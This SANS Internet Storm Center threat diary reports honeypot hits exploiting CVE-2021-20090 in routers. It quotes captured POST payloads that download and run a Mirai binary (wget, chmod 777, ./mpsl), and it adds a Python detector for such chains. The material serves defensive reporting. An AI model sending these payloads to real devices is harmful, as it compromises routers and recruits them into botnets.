Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: SANS Internet Storm Center


Searching for Exposed ASUS Routers Vulnerable to CVE-2021-20090

Published: 2021-11-26
Last Updated: 2021-11-26 13:59:21 UTC
by Guy Bruneau (Version: 1)

Over the past 7 days, my honeypot captured a few hundred POST requests for a vulnerability which appeared to be tracked as a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware. If successfully exploited, it could allow unauthenticated remote actors to bypass authentication and add the router to the Mirai botnet.

20211125-135312: data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//;chmod 777 *;./mpsl selfrep.asus

20211126-090429: data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//;chmod 777 *;./mpsl selfrep.asus
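
A detection sketch for the log entries above, added here as an example and not the diary author's tooling: it parses the two-line honeypot format shown and flags request bodies that chain a download, a chmod and an execution. The function names, the stage patterns and the third log entry are assumptions constructed for illustration.

```python
import re
from datetime import datetime

# Entries 1-2 are copied from the diary (URL defanged/truncated as published); entry 3 is constructed.
SAMPLE_LOG = """\
20211125-135312: data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//;chmod 777 *;./mpsl selfrep.asus
20211126-090429: data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//;chmod 777 *;./mpsl selfrep.asus
20211126-101500: data
POST /login.cgi username=admin&password=admin
"""

HEADER = re.compile(r"^(\d{8}-\d{6}): data$")
REQUEST = re.compile(r"^(GET|POST) (\S+) ?(.*)$")
# Stages of a shell downloader chain, as seen in the captured payload (assumed patterns).
STAGES = {
    "download": re.compile(r"\b(wget|curl|tftp)\b"),
    "make_executable": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "execute": re.compile(r"(?:^|;)\s*\./(\S+)(?:\s+(\S+))?"),
}

def parse_entries(text):
    """Yield (timestamp, method, path, body) for each two-line log entry."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    for head, req in zip(lines, lines[1:]):
        h, r = HEADER.match(head), REQUEST.match(req)
        if h and r:
            ts = datetime.strptime(h.group(1), "%Y%m%d-%H%M%S")
            yield ts, r.group(1), r.group(2), r.group(3)

def classify(body):
    """Return the matched stages plus the executed file and its argument."""
    hits = {name: rx.search(body) for name, rx in STAGES.items()}
    run = hits["execute"]
    return {
        "stages": sorted(n for n, m in hits.items() if m),
        "binary": run.group(1) if run else None,
        "tag": run.group(2) if run else None,
    }

def suspicious(text):
    """Return entries whose body contains all three downloader stages."""
    found = []
    for ts, _method, path, body in parse_entries(text):
        info = classify(body)
        if len(info["stages"]) == len(STAGES):
            found.append({"time": ts, "path": path, **info})
    return found
```

Grouping the results by `tag` and `binary` separates campaigns that reuse the same request path with different payload names.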

Indicators Top 10 IPs

URL Indicators





Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
